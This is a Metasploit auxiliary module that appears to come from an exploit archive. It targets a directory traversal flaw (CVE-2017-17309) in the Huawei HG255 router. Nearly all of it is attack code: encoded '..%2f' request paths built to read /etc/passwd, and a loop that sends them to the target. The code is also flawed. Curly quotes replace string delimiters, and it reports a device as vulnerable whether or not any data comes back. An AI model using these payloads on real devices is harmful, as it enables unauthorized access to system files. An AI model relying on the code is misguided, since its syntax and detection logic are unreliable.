Huawei HG255 - Directory Traversal (Metasploit)

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#
##


class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient

   def initialize
       super(
           'Name'        => 'Huawei HG255 Directory Traversal',
           ‘Description’ => ‘Server Directory Traversal at Huawei HG255 by malicious GET requests’,
           ‘Author’      => ‘Ismail Tasdelen’,
           ‘License’     => MSF_LICENSE,
           ‘References’     =>
           [
              ['CVE', '2017-17309' ],
              ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']
           ]
       )
       register_options(
           [
               Opt::RPORT(80)
           ], self.class
       )
   end

   def run
       urllist=[
           ‘/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
           ‘/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
           ‘/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
           ‘/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’]

       urllist.each do |url|
           begin
               res = send_request_raw(
               {
                       ‘method’=> ‘GET’,
                       ‘uri’=> url
               })

               if res
                   print_good(“Vulnerable! for #{url}”)
               else
                   print_status(“Vulnerable(no response) detected for #{url}”)
               end
           rescue Errno::ECONNRESET
               print_status(“Vulnerable(rst) detected for #{url}”)
           rescue Exception
               print_error(“Connection failed.”)
           end
       end
   end